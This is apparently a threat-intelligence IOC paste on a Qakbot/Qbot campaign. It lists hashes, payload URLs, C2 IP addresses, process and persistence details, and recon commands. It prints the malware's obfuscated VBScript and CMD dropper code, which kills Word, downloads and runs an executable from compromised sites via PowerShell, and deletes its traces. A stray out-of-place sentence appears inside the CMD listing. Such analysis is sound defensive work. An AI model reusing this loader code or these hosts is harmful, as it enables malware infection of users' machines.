VRad

#Qbot_250820

Aug 26th, 2020 (edited)
358
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.38 KB | None | 0 0
  1. #IOC #OptiData #VR #Qakbot_Qbot #macros #WSH #opendir
  2.  
  3. https://pastebin.com/2EgQnFjW
  4.  
  5. previous_contact: n/a
  6.  
  7. FAQ:
  8. https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/
  9. https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot
  10.  
  11. attack_vector
  12. --------------
  13. email attach .zip > DOC > macro > WSH > CMD > PowerShell > GET exe
  14.  
  15. email_headers
  16. --------------
  17. n/a
  18.  
  19. files
  20. --------------
  21. SHA-256 b249a39d2754ce9d5f81fb65c4cc744492923e47f51299b87996e230894df97a
  22. File name 08252020_365727360.zip [ Zip archive data, at least v2.0 to extract ]
  23. File size 321.84 KB (329568 bytes)
  24.  
  25. SHA-256 8374cb6d37e2a002f93b3b2646d3550ed2915ac4fec2ed14db3557ac245f32c1
  26. File name 08252020_365727360.doc [ Office Open XML Document ]
  27. File size 328.47 KB (336352 bytes)
  28.  
  29. SHA-256 1e77f308d4e8ce8ea219fa9e18656eeedb947fd12aaf9730daa65e85cab38adf
  30. File name 55555555.png [ PE32 executable for MS Windows ]
  31. File size 1.86 MB (1953776 bytes)
  32.  
  33. SHA-256 e920f6ed9aa65595a6b52d6601bd9091ef87f5128d6fdfc8f5ebd1fec12740f7
  34. File name ikaaazen.exe [ PE32 executable for MS Windows ]
  35. File size 1.86 MB (1953776 bytes)
  36.  
  37. activity
  38. --------------
  39. PL_SCR rosemiracle.} com/smmafmjmmjpx/55555555.png - 404
  40. ricari.com.} br/spdwacdphg/55555555.png - 200
  41. fishlovingworld.} com/imbmgiqzrki/55555555.png - 200
  42. styletadka.} in/fkvias/55555555.png - 404
  43. test.bateaux-bois.} com/cgcxd/55555555.png - 200
  44. lumanaridecorative.} com/vnmjevz/55555555.png - 200
  45. kmbuzz.} com/tlrmuyrjc/55555555.png - 200
  46. alfredoburguers.} cl/vhrizp/55555555.png - 200
  47. teste4.filimartis.} com.} br/jdnpsysj/55555555.png - 200
  48. equitymm.} com/idlzuojgtfo/55555555.png - 404
  49. americanwardrobefitters.} com/xsgqcd/55555555.png - 200
  50. onlyicon.} com/jbhmomji/55555555.png - 200
  51.  
  52. C2 [spx161]
  53. 213.67.45.195:2222
  54. 75.182.214.87:443
  55. 81.133.234.36:2222
  56. 199.116.241.147:443
  57. 75.136.40.155:443
  58. 72.204.242.138:443
  59. 94.52.160.116:443
  60. 151.73.112.220:443
  61. 71.126.139.251:443
  62. 98.173.34.212:995
  63. 41.34.91.244:995
  64. 103.238.231.40:443
  65. 47.153.115.154:995
  66. 104.221.4.11:2222
  67. 185.126.13.230:995
  68. 137.99.224.198:443
  69. 73.4.138.94:443
  70. 201.216.216.245:443
  71. 175.211.225.118:443
  72. 76.179.54.116:443
  73. 70.164.37.205:995
  74. 207.246.75.201:443
  75. 97.93.211.17:443
  76. 71.74.12.34:443
  77. 207.246.71.122:443
  78. 80.240.26.178:443
  79. 45.32.154.10:443
  80. 108.27.217.44:443
  81. 80.14.209.42:2222
  82. 207.255.161.8:993
  83. 207.255.161.8:995
  84. 84.117.176.32:443
  85. 87.255.83.83:443
  86. 154.56.69.231:443
  87. 108.28.179.42:995
  88. 191.84.11.252:443
  89. 69.26.23.143:2222
  90. 98.16.204.189:995
  91. 24.27.82.216:2222
  92. 184.89.71.68:443
  93. 199.247.16.80:443
  94. 86.191.145.103:2222
  95. 207.255.161.8:2078
  96. 66.30.92.147:443
  97. 115.21.224.117:443
  98. 63.155.28.199:995
  99. 47.146.32.175:443
  100. 24.37.178.158:443
  101. 69.11.247.242:443
  102. 165.120.230.108:2222
  103. 36.77.151.211:443
  104. 96.20.108.17:2222
  105. 73.228.1.246:443
  106. 76.170.77.99:995
  107. 174.30.165.242:2222
  108. 94.205.171.126:995
  109. 39.118.245.6:443
  110. 83.216.134.94:2222
  111. 118.160.161.124:443
  112. 45.47.65.191:443
  113. 67.165.206.193:993
  114. 93.151.180.170:61202
  115. 98.210.41.34:443
  116. 50.29.181.193:995
  117. 78.96.199.79:443
  118. 66.215.32.224:443
  119. 93.114.192.104:2222
  120. 86.98.89.189:2222
  121. 75.87.161.32:995
  122. 203.198.96.186:443
  123. 141.158.47.123:443
  124. 73.78.149.206:443
  125. 35.134.202.234:443
  126. 67.170.137.8:443
  127. 96.18.240.158:443
  128. 75.110.250.89:995
  129. 98.219.77.197:443
  130. 24.201.79.208:2078
  131. 96.227.127.13:443
  132. 65.131.104.249:995
  133. 70.164.39.91:443
  134. 98.121.187.78:443
  135. 209.137.209.163:995
  136. 178.87.28.63:443
  137. 78.100.229.44:61201
  138. 90.175.88.99:2222
  139. 74.56.167.31:443
  140. 206.51.202.106:50003
  141. 5.15.65.198:2222
  142. 71.84.5.114:995
  143. 65.96.36.157:443
  144. 47.44.217.98:443
  145. 72.190.101.70:443
  146. 92.99.249.199:443
  147. 217.165.164.57:2222
  148. 71.163.222.7:443
  149. 72.204.242.138:32102
  150. 72.204.242.138:50001
  151. 101.108.117.41:443
  152. 77.27.174.49:995
  153. 217.165.115.0:990
  154. 199.247.22.145:443
  155. 72.204.242.138:53
  156. 72.204.242.138:990
  157. 173.26.189.151:443
  158. 84.78.128.76:2222
  159. 47.206.174.82:443
  160. 189.157.196.112:995
  161. 39.36.101.208:995
  162. 193.248.44.2:2222
  163. 37.210.51.210:443
  164. 94.99.116.7:995
  165. 31.215.99.5:443
  166. 47.28.131.209:443
  167. 100.4.173.223:443
  168. 72.209.191.27:443
  169. 209.182.122.217:443
  170. 5.193.155.181:2078
  171. 103.110.49.88:443
  172. 12.5.37.3:995
  173. 216.163.4.132:443
  174. 72.66.47.70:443
  175. 59.124.10.133:443
  176. 96.19.117.140:443
  177. 24.205.42.241:443
  178. 172.78.30.215:443
  179. 71.80.66.107:443
  180. 197.165.161.55:995
  181. 45.32.155.12:443
  182. 45.77.215.141:443
  183. 68.190.152.98:443
  184. 80.195.103.146:2222
  185. 2.90.123.252:443
  186. 174.110.39.220:443
  187. 71.187.170.235:443
  188. 72.204.242.138:32100
  189. 49.191.3.189:443
  190. 142.129.227.86:443
  191. 67.209.195.198:443
  192. 2.90.53.174:995
  193. 95.77.223.148:443
  194. 41.228.4.27:443
  195. 188.25.162.27:443
  196. 130.25.130.19:2222
  197. 211.24.72.253:443
  198. 68.174.15.223:443
  199. 216.201.162.158:443
  200. 74.135.37.79:443
  201. 94.59.241.189:995
  202.  
  203. netwrk
  204. --------------
  205. [http]
  206. 216.21.13.115 ricari.com.br GET /spdwacdphg/55555555.png (!) MZ !This program cannot be run in DOS mode.
  207.  
  208. comp
  209. --------------
  210. powershell.exe 2668 TCP 83.150.213.54 80 ESTABLISHED
  211. powershell.exe 2668 TCP 216.21.13.115 80 ESTABLISHED
  212.  
  213. proc
  214. --------------
  215. C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
  216. C:\Windows\SysWOW64\explorer.exe explorer.exe C:\ProgramData\re.vbs
  217.  
  218. {other context}
  219.  
  220. C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  221. C:\Windows\System32\WScript.exe" "C:\ProgramData\re.vbs
  222. C:\Windows\System32\cmd.exe /c ""C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd" "
  223. C:\Windows\system32\taskkill.exe
  224.  
  225. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWerShell Foreach($url in @('http://rosemiracle.com/smmafmjmmjpx/55555555.png','http://ricari.com.br/spdwacdphg/55555555.png','http://fishlovingworld.com/imbmgiqzrki/55555555.png','http://styletadka.in/fkvias/55555555.png','http://test.bateaux-bois.com/cgcxd/55555555.png','http://lumanaridecorative.com/vnmjevz/55555555.png','http://kmbuzz.com/tlrmuyrjc/55555555.png','http://alfredoburguers.cl/vhrizp/55555555.png','http://teste4.filimartis.com.br/jdnpsysj/55555555.png','http://equitymm.com/idlzuojgtfo/55555555.png','http://americanwardrobefitters.com/xsgqcd/55555555.png','http://onlyicon.com/jbhmomji/55555555.png')) { try{$path = 'C:\Ulohot\GretiodetGDFERT.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}
  226.  
  227. C:\Ulohot\GretiodetGDFERT.exe
  228. C:\Ulohot\GretiodetGDFERT.exe /C
  229. C:\Windows\system32\timeout.exe /T 10
  230.  
  231. {alternative run}
  232.  
  233. C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe
  234. C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe /C
  235. C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn omjbpoxjy /tr "\"C:\Ulohot\GretiodetGDFERT.exe\" /I omjbpoxjy" /SC ONCE /Z /ST 08:05 /ET 08:17
  236. "C:\Windows\system32\schtasks.exe" /create /tn {CB895919-CAFA-4089-9BC0-B5CAA5E6F386} /tr "\"C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe"" /sc HOURLY /mo 5 /F
  237.  
  238. {recon activiry}
  239.  
  240. command: whoami /all
  241. command: cmd /c set
  242. command: ipconfig /all
  243. command: net view /all
  244. command: nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.WORKGROUP
  245. command: nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.WORKGROUP
  246. command: net share
  247. command: route print
  248. command: netstat -nao
  249. command: net localgroup
  250. command: qwinsta
  251.  
  252. persist
  253. --------------
  254. NT AUTHORITY\SYSTEM
  255. C:\Ulohot\GretiodetGDFERT.exe
  256.  
  257. CB895919-CAFA-4089-9BC0-B5CAA5E6F386
  258. C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe
  259.  
  260. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\*
  261. C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe
  262.  
  263. drop
  264. --------------
  265. C:\ProgramData\PIYRFFjjhFGrftfgFYgrfthVfYHtrfGhyhf
  266. C:\ProgramData\re.vbs
  267. C:\Ulohot\GretiodetGDFERT.exe
  268. C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd
  269. C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe
  270.  
  271. re.vbs
  272. --------------
  273. set GetyuwuiebejhwbjTYYIDTIFFGD=CreateObject("Scripting.FileSystemObject")
  274. If Not GetyuwuiebejhwbjTYYIDTIFFGD.FolderExists("c:\Ulohot") Then
  275. GetyuwuiebejhwbjTYYIDTIFFGD.CreateFolder ("c:\Ulohot")
  276. End If
  277.  
  278. e13 = ("Taskkill /IM ""winword.exe"" /F")
  279. a1 = ("POW^")a2 = ("erS^")a3 = ("hell ^")a4 = ("Forea^")a5 = ("ch($ur^")a6 = ("l in^")a7 = (" @('^")
  280. a8 = ("http://rosemiracle.com/smmafmjmmjpx/55555555.png','http://ricari.com.br/spdwacdphg/55555555.png','http://fishlovingworld.com/imbmgiqzrki/55555555.png','http://styletadka.in/fkvias/55555555.png','http://test.bateaux-bois.com/cgcxd/55555555.png','http://lumanaridecorative.com/vnmjevz/55555555.png','http://kmbuzz.com/tlrmuyrjc/55555555.png','http://alfredoburguers.cl/vhrizp/55555555.png','http://teste4.filimartis.com.br/jdnpsysj/55555555.png','http://equitymm.com/idlzuojgtfo/55555555.png','http://americanwardrobefitters.com/xsgqcd/55555555.png^")
  281. a9 = ("','^")a10 = ("http://onlyicon.com/jbhmomji/55555555.png^")
  282. a11 = ("')) { tr^")a12 = ("y{$pat^")a15 = ("h = 'C:\Ulohot\GretiodetGDFERT.exe'; ^")
  283. a16 = ("(Ne^")a17 = ("w-Obje^")a18 = ("ct Ne^")a19 = ("t.We^")a20 = ("bCli^")a21 = ("ent).Down^")
  284. a22 = ("loadF^")a23 = ("ile(^")a24 = ("$ur^")a25 = ("l.ToSt^")a26 = ("ring^")b1 = ("(), $p^")
  285. b2 = ("ath)^")b3 = (";sa^")b4 = ("ps $p^")b5 = ("ath; br^")b6 = ("eak;}c^")b7 = ("atc^")
  286. b8 = ("h{wri^")b9 = ("te-ho^")b10 = ("st $_.E^")b11 = ("xcep^")b12 = ("tio^")b13 = ("n.Me^")
  287. b14 = ("ssa^")b15 = ("ge}}")
  288.  
  289. Wait = ("TIMEOUT /T 10 & DEL C:\ProgramData\re.vbs & DEL C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd & DEL C:\ProgramData\PIYRFFjjhFGrftfgFYgrfthVfYHtrfGhyhf")
  290.  
  291. Dim oShell : Set oShell = CreateObject("WScript.Shell")
  292.  
  293. WScript.Sleep 7000
  294.  
  295. oShell.Run "C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd", 0, 0
  296. Set WshShell = Nothing
  297.  
  298. 'NorteDolk 'NorteDolk 'NorteDolk
  299.  
  300. POUITYRSDFuytrdFGHTYDFGBJN.cmd
  301. --------------
  302. You're going to need to keep at least 8 of the src at the end of the string. You need to modify the input documentation page.
  303.  
  304. Taskkill /IM "winword.exe" /F
  305.  
  306. POW^erS^hell ^Forea^ch($ur^l in^ @('^
  307. http://rosemiracle.com/smmafmjmmjpx/55555555.png','
  308. http://ricari.com.br/spdwacdphg/55555555.png','
  309. http://fishlovingworld.com/imbmgiqzrki/55555555.png','
  310. http://styletadka.in/fkvias/55555555.png','
  311. http://test.bateaux-bois.com/cgcxd/55555555.png','
  312. http://lumanaridecorative.com/vnmjevz/55555555.png','
  313. http://kmbuzz.com/tlrmuyrjc/55555555.png','
  314. http://alfredoburguers.cl/vhrizp/55555555.png','
  315. http://teste4.filimartis.com.br/jdnpsysj/55555555.png','
  316. http://equitymm.com/idlzuojgtfo/55555555.png','
  317. http://americanwardrobefitters.com/xsgqcd/55555555.png^
  318. ','^http://onlyicon.com/jbhmomji/55555555.png^'))
  319. { tr^y{$pat^h = 'C:\Ulohot\GretiodetGDFERT.exe'; ^
  320. (Ne^w-Obje^ct Ne^t.We^bCli^ent).Down^loadF^ile(^$ur^l.ToSt^ring^(), $p^ath)^;sa^ps $p^ath; br^eak;}
  321. c^atc^h{wri^te-ho^st $_.E^xcep^tio^n.Me^ssa^ge}}
  322.  
  323. You're going to need to keep at least 8 of the src at the end of the string. You need to modify the input documentation page.
  324.  
  325. TIMEOUT /T 10 &
  326. DEL C:\ProgramData\re.vbs &
  327. DEL C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd &
  328. DEL C:\ProgramData\PIYRFFjjhFGrftfgFYgrfthVfYHtrfGhyhf
  329.  
  330. # # #
  331. https://www.virustotal.com/gui/file/b249a39d2754ce9d5f81fb65c4cc744492923e47f51299b87996e230894df97a/details
  332. https://www.virustotal.com/gui/file/8374cb6d37e2a002f93b3b2646d3550ed2915ac4fec2ed14db3557ac245f32c1/details
  333. https://www.virustotal.com/gui/file/1e77f308d4e8ce8ea219fa9e18656eeedb947fd12aaf9730daa65e85cab38adf/details
  334. https://www.virustotal.com/gui/file/e920f6ed9aa65595a6b52d6601bd9091ef87f5128d6fdfc8f5ebd1fec12740f7/details
  335.  
  336. https://analyze.intezer.com/analyses/2638bd19-de0a-4ce7-b7cf-da19052d14e0
  337. https://analyze.intezer.com/analyses/6eb14337-f3b1-46da-aeed-c7c01b528f1d
  338.  
  339. VR
Add Comment
Please, Sign In to add comment